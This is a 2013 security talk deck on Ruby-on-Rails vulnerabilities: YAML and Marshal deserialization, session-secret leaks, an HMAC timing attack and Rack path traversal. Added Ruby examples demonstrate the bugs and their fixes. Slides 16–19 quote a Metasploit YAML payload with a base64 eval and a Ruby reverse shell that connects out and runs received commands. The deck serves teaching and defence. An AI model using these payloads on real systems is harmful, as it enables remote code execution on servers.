Ruxmon Feb 2013: What happened to Rails
Talk I did in February 2013 during Ruxmon monthly meeting

1. What happened to Ruby-on-Rails?
Louis Nyffenegger, louis@pentesterlab.com, @snyff

2. About me...
● Independent security consultant:
  ○ Code review
  ○ Training
  ○ Penetration testing
● Work on really cool stuff in my free time:
  ○ https://pentesterlab.com/exercises
  ○ https://pentesterlab.com/bootcamp/

3. Ruby-On-Rails
● Ruby framework to develop web applications
● Protects against most common web security issues:
  ○ SQL injection
  ○ Cross-Site Scripting
  ○ Cross-Site Request Forgery
● Good reputation... including security-wise

4. What happened to Rails?
● Recently a lot of vulnerabilities have been published in Ruby-On-Rails
● In the past, most vulnerabilities were low-risk issues, nothing really bad
● This time we're talking remote code execution

5. Rails Security: The usual suspects...
@benmmurphy @joernchen @tenderlove @homakov @charliesome @postmodern_mod3

6. Non-technical reasons
● People assumed it was secure
● More and more used:
  ○ more users -> more targeted
  ○ if an application didn't get any bug published, it's probably because no one cares
● A lot of Ruby hackers:
  ○ Ruby-on-Rails devs
  ○ People looking for bugs in Ruby-on-Rails and Ruby-on-Rails applications

7. It all started... CVE-2012-5664
● Talk from Joernchen (Phenoelit) at ZeroNights: "Let me github that for you" (21/12/2012)
● Rack session (used by Rails):
  ○ base64(Marshal(data))--HMAC-SHA1(base64(Marshal(data)), secret)
● PentesterLab exercise on this: https://pentesterlab.com/rack_cookies_and_commands_injection.html

8. It all started... CVE-2012-5664
● Session secret exposed on GitHub:
  ○ Arbitrary session modifications
  ○ SQL injection if you know the secret and the application uses authlogic
● Limited risk based on this... in theory
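A worked version of the cookie layout above, as an added example (not code from the deck, from Rack or from Rails): sign a session the way the cookie store does, verify it, and forge one once the secret is known. The secret, the session contents and the helper names (sign_session, load_session, forge_session) are assumptions made for the demo.

```ruby
require 'openssl'

# Added example, not Rack/Rails code: the cookie-store layout
#   base64(Marshal.dump(data)) + "--" + HMAC-SHA1(base64 blob, secret)
# The secret and the session contents used below are constructed.

def generate_hmac(blob, secret)
  OpenSSL::HMAC.hexdigest('SHA1', secret, blob)
end

# Server side: serialize with Marshal, base64 it (the 'm0' pack directive,
# the same one the msf payload on slide 16 decodes with), then sign the blob.
def sign_session(data, secret)
  blob = [Marshal.dump(data)].pack('m0')
  "#{blob}--#{generate_hmac(blob, secret)}"
end

# Constant-time comparison: plain == stops at the first mismatching byte,
# which leaks how much of a digest an attacker already has right.
def secure_compare(a, b)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).inject(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

# Server side: check the HMAC first, only then Marshal.load. Marshal.load of
# unauthenticated bytes is itself a code-execution sink, so a leaked secret
# means "run Marshal.load on whatever the attacker likes". Returns the
# session Hash, or nil when the cookie is malformed or the HMAC is wrong.
def load_session(cookie, secret)
  blob, digest = cookie.split('--', 2)
  return nil unless blob && digest
  return nil unless secure_compare(generate_hmac(blob, secret), digest)
  Marshal.load(blob.unpack1('m0'))
rescue ArgumentError, TypeError
  nil
end

# Attacker side, once the secret has been found in a public repository:
# no bug is needed, just sign any session you want.
def forge_session(leaked_secret, wanted)
  sign_session(wanted, leaked_secret)
end

if __FILE__ == $PROGRAM_NAME
  secret = 'c0ffee-session-secret'                    # constructed
  cookie = sign_session({ 'user_id' => 42 }, secret)
  puts cookie
  p load_session(cookie, secret)                      # => {"user_id"=>42}
  p load_session(cookie, 'wrong-secret')              # => nil
  forged = forge_session(secret, { 'user_id' => 1, 'admin' => true })
  p load_session(forged, secret)                      # => {"user_id"=>1, "admin"=>true}
end
```

The order inside load_session is the whole point: verify, then deserialize. Swap the two and the cookie store deserializes attacker-controlled Marshal data even when the secret is safe.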
9. It all started... CVE-2012-5664
● As always... Twitter started screaming and loling on this bug...
  ○ signal vs noise :/
● A lot of people (including me) thought it was only exploitable under this condition:
  http://blog.pentesterlab.com/2013/01/on-exploiting-cve-2012-5664.html
  http://blog.phusion.nl/2013/01/03/rails-sql-injection-vulnerability-hold-your-horses-here-are-the-facts/

10. It all started... CVE-2012-5664
● If you want to do something like:
  http://vulnerable/id[:select]=password from users
● Rails prevents this:
  ○ if you submit a hash, all keys get converted to Strings
  ○ then Rails checks that the keys submitted are valid (Symbol) keys, so a String key is rejected:
    def assert_valid_keys(*valid_keys)
      unknown_keys = keys - [valid_keys].flatten
      raise(ArgumentError, "Unknown key(s): #{unknown_keys.join(", ")}") unless unknown_keys.empty?
    end

11. All could have happily stopped here... but people started digging to find a way around this...

12. And it turned out...
● Rails can do a LOT of stuff...
  ○ parse traditional requests
  ○ parse XML requests
  ○ parse JSON requests
● And you can send YAML inside JSON and XML requests...

13. YAML
● "YAML is a human-readable data serialization format" (Wikipedia).
    ---
    receipt: Oz-Ware Purchase Invoice
    date: 2007-08-06
    customer:
      given: Dorothy
      family: Gale

14. YAML inside XML...
    <?xml version="1.0" encoding="UTF-8"?>
    <blah type="yaml">--- !ruby/hash:...</blah>
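Why the String-key check on slide 10 stops the query-string attack but not the YAML one, as an added example (not code from the deck or from Rails): a minimal query-string parser produces String keys, which assert_valid_keys rejects; the same hash arriving as a YAML document (what Rails' XML parser fed to the YAML loader for an element with type="yaml") comes back with Symbol keys and passes. The ALLOWED_KEYS list, the inputs and the function names are assumptions for the demo; YAML.safe_load is shown as the check that would have refused the Symbol.

```ruby
require 'yaml'

# Added example, not Rails code. Inputs and names below are constructed.

# Stand-in for a finder's option whitelist (Symbols, like Rails' VALID_FIND_OPTIONS).
ALLOWED_KEYS = [:conditions, :select, :order].freeze

# Same logic as the assert_valid_keys on slide 10, written as a function.
def assert_valid_keys(hash, *valid_keys)
  unknown_keys = hash.keys - [valid_keys].flatten
  raise(ArgumentError, "Unknown key(s): #{unknown_keys.join(', ')}") unless unknown_keys.empty?
  hash
end

# Minimal stand-in for Rack's query parser: "id[select]=..." yields String
# keys, because a query string has no way to say "Symbol". Even
# "id[:select]=..." only yields the String ":select".
def parse_query_param(query)
  query.split('&').each_with_object({}) do |pair, params|
    key, value = pair.split('=', 2)
    if (m = key.match(/\A([^\[]+)\[([^\]]*)\]\z/))
      (params[m[1]] ||= {})[m[2]] = value
    else
      params[key] = value
    end
  end
end

# What the vulnerable parser did with the element text: a full YAML load,
# which happily builds Symbols (and, as later slides show, arbitrary objects).
# YAML.load is unsafe on Ruby < 3.1; newer Psych spells the unsafe path unsafe_load.
def load_yaml_param(text)
  YAML.respond_to?(:unsafe_load) ? YAML.unsafe_load(text) : YAML.load(text)
end

# The check that would have refused it: safe_load permits only plain
# scalars, Arrays and Hashes. Returns nil when the document is rejected.
def safe_yaml_param(text)
  YAML.safe_load(text)
rescue Psych::DisallowedClass
  nil
end

if __FILE__ == $PROGRAM_NAME
  from_query = parse_query_param('id[select]=password from users')['id']
  p from_query                                   # => {"select"=>"password from users"}
  begin
    assert_valid_keys(from_query, *ALLOWED_KEYS)
  rescue ArgumentError => e
    puts "query string blocked: #{e.message}"    # Unknown key(s): select
  end

  yaml_doc = "---\n:select: password from users\n"
  from_yaml = load_yaml_param(yaml_doc)
  p from_yaml                                    # => {:select=>"password from users"}
  p assert_valid_keys(from_yaml, *ALLOWED_KEYS)  # passes: attacker controls SELECT
  p safe_yaml_param(yaml_doc)                    # => nil (Symbol not permitted)
end
```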
15. From YAML to code execution
● To translate that into OS terms: "you have FTP access to a system and want to get command execution from it"
● Need to find a way to inject code and get it executed...
● Many methods, more or less reliable depending on the version of Ruby and Ruby-On-Rails

16. From YAML to code execution: msf way
    <SWfzexMD type=yaml>--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection
    XIH; eval(%[Y29k...KZW5k].unpack(%[m0])[0]); : !ruby/object:ActionController::Routing::Route
      segments: []
      requirements:
        :tFuEk:
          :jyWUTgfc: :CAxk
    </SWfzexMD>

17. From YAML to code execution: msf way
● You basically inject code that will get evaluated by Ruby-On-Rails automatically
● The same vulnerability can also be used to get SQL injection using Arel
● From the code evaluated, msf does its usual stuff:
  ○ fork
  ○ connect back

18. From YAML to code execution: msf way
    code = %(cmVxdW...ml9).unpack(%(m0)).first
    if RUBY_PLATFORM =~ /mswin|mingw|win32/
      [...]
    else
      if ! Process.fork()
        eval(code) rescue nil
      end
    end

19. From YAML to code execution: msf way
    require 'socket'
    c = TCPSocket.new("[::1]", "4444")
    $stdin.reopen(c); $stdout.reopen(c); $stderr.reopen(c)
    $stdin.each_line { |l| l = l.strip; next if l.length == 0; system(l) }

20. CVE-2013-0156... only POST?
● Only POST?
  ○ you need to send the XML in the body of the request...
● You can do a POST request and use the HTTP header "X-HTTP-Method-Override: get" to get Rails to use your payload as if it was in a GET request

21. CVE-2013-0155
● "Unsafe Query Generation Risk in Ruby on Rails" (not SQL injection) using JSON
● Depends on the code used:
    user = User.find_by_token(params[:token])
    -> SELECT * FROM users WHERE token = ...
● You can manipulate the query using JSON (the parsed parameters contain nil values the query builder does not expect) to remove the WHERE condition:
    -> SELECT * FROM users

22. Rack
● "Rack provides a minimal interface between web servers supporting Ruby and Ruby frameworks."
● Used by Rails and other frameworks
● Two vulnerabilities published in the same period:
  ○ CVE-2013-0262
  ○ CVE-2013-0263 (already reported in 2009)

23. Rack... CVE-2013-0263
    def digest_match?(data, digest)
      return unless data && digest
      @secrets.any? do |secret|
        digest == generate_hmac(data, secret)
      end
    end

24. Rack... CVE-2013-0263
● Timing attack...
  ○ Create a malicious value
  ○ Bruteforce a valid HMAC
    ■ send HMAC "aaaaaaaaaaa..."
    ■ send HMAC "baaaaaaaaaa..."
    ■ send HMAC "caaaaaaaaaa..."
    ■ ...
    ■ compare response times
● Unlikely from the Internet
  ○ more realistic for "intercloud" attacks (attacker hosted next to the target)...
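To make the leak in digest_match? visible without a stopwatch, here is an added example (not Rack's code) that counts how many bytes an early-exit comparison examines versus a constant-time one, following the "try the first character, then the second" idea from the bullets above. The secrets, the cookie blob and the function names are constructed for the demo; the constant-time version is the same idea as Rack::Utils.secure_compare, which is what the fix introduced.

```ruby
require 'openssl'

# Added example, not Rack code. Secrets and the cookie blob are constructed.
SECRETS = ['current-secret-0123', 'rotated-out-secret-9abc'].freeze

def generate_hmac(data, secret)
  OpenSSL::HMAC.hexdigest('SHA1', secret, data)
end

# What String#== does underneath: compare byte by byte, stop at the first
# mismatch. Returns [equal?, bytes_examined] so the leak shows up as a number.
def leaky_equal(a, b)
  examined = 0
  return [false, examined] unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).each do |x, y|
    examined += 1
    return [false, examined] unless x == y
  end
  [true, examined]
end

# Constant-time comparison: every byte is touched no matter where the
# strings differ, so the work done no longer depends on the attacker's guess.
def secure_equal(a, b)
  return [false, 0] unless a.bytesize == b.bytesize
  diff = 0
  a.bytes.zip(b.bytes).each { |x, y| diff |= x ^ y }
  [diff.zero?, a.bytesize]
end

# The shape on slide 23 (multiple secrets for rotation), vulnerable variant.
def digest_match_leaky?(data, digest)
  return false unless data && digest
  SECRETS.any? { |s| leaky_equal(generate_hmac(data, s), digest).first }
end

# Same logic with the constant-time compare: the fix.
def digest_match_secure?(data, digest)
  return false unless data && digest
  SECRETS.any? { |s| secure_equal(generate_hmac(data, s), digest).first }
end

if __FILE__ == $PROGRAM_NAME
  data = 'BAh7BkkiDHVzZXJfaWQGOgZFRmkv'          # constructed cookie blob
  target = generate_hmac(data, SECRETS.first)   # 40 hex chars the attacker wants
  wrong_first = (target[0] == '0' ? '1' : '0') + '0' * 39
  right_first = target[0] + (target[1] == '0' ? '1' : '0') + '0' * 38
  p leaky_equal(target, wrong_first)            # => [false, 1]
  p leaky_equal(target, right_first)            # => [false, 2]  one byte deeper: the leak
  p secure_equal(target, wrong_first)           # => [false, 40]
  p secure_equal(target, right_first)           # => [false, 40]
  p digest_match_secure?(data, target)          # => true
end
```

Over a network the "one byte deeper" difference is nanoseconds of memcmp buried in jitter, which is why the deck calls it unlikely from the Internet; from a VM on the same host it is measurable with enough samples, and the fix costs nothing, so there is no reason to keep the plain ==.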
25. CVE-2013-0277
● Rails allows developers to store serialized data easily:
    class Post < ActiveRecord::Base
      serialize :tags
    end
● Turns out the serialisation is done using YAML... If a user can manipulate this parameter... game over :/

26. Rack... CVE-2013-0262
● Directory traversal in Rack::File
● When I looked at the bug I found an XSS in the same code
  ○ and another one in similar code in another file:
    fail(404, "File not found: #{path_info}")
  ○ and the fact that Rack follows symlinks
● Turns out this is used by BeEF... Content-Type: text/plain limits the impact though
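The three points on the Rack::File slide (traversal, symlinks, the echoed path) turned into checks, as an added example that is not Rack's code: normalise the requested path so ".." cannot climb above the root, resolve symlinks and confirm the real file still lives under the root, and escape the path before it goes into an error body. The directory layout is built in a temporary directory for the demo, and the function names are assumptions.

```ruby
require 'tmpdir'
require 'fileutils'

# Added example, not Rack code. Fixture files and names are constructed.

# Percent-decoding, because "%2e%2e" is ".." once the request is decoded.
def percent_decode(s)
  s.gsub(/%([0-9a-fA-F]{2})/) { Regexp.last_match(1).hex.chr }
end

# Normalisation in the spirit of Rack::Utils.clean_path_info: drop "." and
# empty segments, let ".." pop a segment but never climb above the root.
def clean_path_info(path_info)
  clean = []
  path_info.split('/').each do |seg|
    next if seg.empty? || seg == '.'
    seg == '..' ? clean.pop : clean << seg
  end
  '/' + clean.join('/')
end

# Returns the absolute file to serve, or nil when the request names a missing
# file or escapes the root, whether through ".." or through a symlink.
def resolve_static(root, path_info)
  root_real = File.realpath(root)
  candidate = File.join(root_real, clean_path_info(percent_decode(path_info)))
  return nil unless File.file?(candidate)
  real = File.realpath(candidate)                     # follows symlinks
  return nil unless real.start_with?(root_real + File::SEPARATOR)
  real
end

# The 404 body on slide 26 echoed path_info raw; escape it so the message
# is harmless even when some middleware later relabels the response as HTML.
def not_found_body(path_info)
  escapes = { '&' => '&amp;', '<' => '&lt;', '>' => '&gt;', '"' => '&quot;', "'" => '&#39;' }
  'File not found: ' + path_info.gsub(/[&<>"']/, escapes)
end

# Constructed layout:  base/public/index.html (served), base/secret.txt
# (outside the root) and base/public/link.txt -> base/secret.txt (a symlink
# that the naive implementation would happily follow).
def build_fixture
  base = Dir.mktmpdir('rackfile')
  root = File.join(base, 'public')
  FileUtils.mkdir_p(root)
  File.write(File.join(root, 'index.html'), 'hello')
  File.write(File.join(base, 'secret.txt'), 'db password')
  File.symlink(File.join(base, 'secret.txt'), File.join(root, 'link.txt'))
  [base, root]
end

if __FILE__ == $PROGRAM_NAME
  base, root = build_fixture
  begin
    ['/index.html', '/../secret.txt', '/%2e%2e/secret.txt', '/link.txt'].each do |req|
      puts "#{req.ljust(20)} -> #{resolve_static(root, req).inspect}"
    end
    puts not_found_body('/<script>alert(1)</script>')
  ensure
    FileUtils.rm_rf(base)
  end
end
```

Both checks are needed: clean_path_info alone still serves link.txt, and the realpath check alone would still let a request with an undecoded "%2e%2e" through on a server that decodes later.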
27. Rubygems.org compromised
● Gem == Ruby library
● Rubygems is like a Debian mirror for Ruby
● Information about a package is stored inside metadata.gz, which is a compressed YAML file... and this information gets displayed on the website:
  ○ Someone uploaded an "exploit.gem"...
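What "the serialisation is done using YAML" means in practice for the serialize column (slide 25), for the msf chain (slides 15 to 17) and for the rubygems.org metadata.gz (slide 27), as an added example that is not Rails, Rubygems or deck code: a plain YAML load of attacker-controlled text instantiates any class named by a `!ruby/object:` tag, and that is the primitive every one of those attacks starts from. The Ping class, the two YAML documents and the coder functions are assumptions for the demo; YAML.safe_load with an explicit permitted_classes list is the replacement a practitioner would drop in.

```ruby
require 'yaml'

# Added example, not Rails code. The class and documents below are constructed.

# Some class that exists in the application. Any class whose methods YAML
# touches on load (init_with, []=, hash, ==, to_str, ...) can become a
# gadget; the msf chain uses NamedRouteCollection for exactly that.
class Ping
  attr_accessor :host
  def initialize(host = nil)
    @host = host
  end
end

# What `serialize :tags` did in Rails <= 3.2.11: a full YAML load on a column
# the user can write. Rails did check `is_a?(Array)` afterwards, but by then
# the object has already been built. (YAML.load is the unsafe path on
# Ruby < 3.1; newer Psych spells it unsafe_load.)
def unsafe_coder_load(text)
  YAML.respond_to?(:unsafe_load) ? YAML.unsafe_load(text) : YAML.load(text)
end

# Safe coder: only scalars, Arrays, Hashes and whatever the column is
# documented to hold. Rejected documents come back as an error marker
# instead of raising, so the caller can fail closed.
def safe_coder_load(text, permitted: [])
  YAML.safe_load(text, permitted_classes: permitted, aliases: false)
rescue Psych::DisallowedClass, Psych::BadAlias => e
  { error: e.class.name }
end

HONEST_TAGS   = "---\n- ruby\n- rails\n"                          # constructed
POISONED_TAGS = "--- !ruby/object:Ping\nhost: attacker.example\n"  # constructed

if __FILE__ == $PROGRAM_NAME
  p unsafe_coder_load(HONEST_TAGS)    # => ["ruby", "rails"]
  obj = unsafe_coder_load(POISONED_TAGS)
  p obj.class, obj.host               # Ping, "attacker.example": user data became an object
  p safe_coder_load(POISONED_TAGS)    # => {:error=>"Psych::DisallowedClass"}
  p safe_coder_load(HONEST_TAGS)      # => ["ruby", "rails"]
end
```

The permitted_classes list is an allowlist, not a blocklist: permitting Ping makes the poisoned document load again, so every entry in it should be a class you have checked has no interesting load-time behaviour.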
28. So what to do from now?
● ".to_s all the things"
  ○ most of the issues come from the mapping performed by Ruby-On-Rails (a parameter you expect to be a String arriving as a Hash, Array, Symbol or object)
● Upgrade... (bundler-audit)
● Remove parsers you don't need:
    ActionDispatch::ParamsParser::DEFAULT_PARSERS.delete(Mime::XML)
    ActionDispatch::ParamsParser::DEFAULT_PARSERS.delete(Mime::JSON)

29. And since we are talking about Rails
● Someone recently put together all the ways to have vulnerable code in Ruby-on-Rails: http://rails-sqli.org/
● You should also check Meder's Ruby Security Reviewer's Guide: http://code.google.com/p/ruby-security/wiki/Guide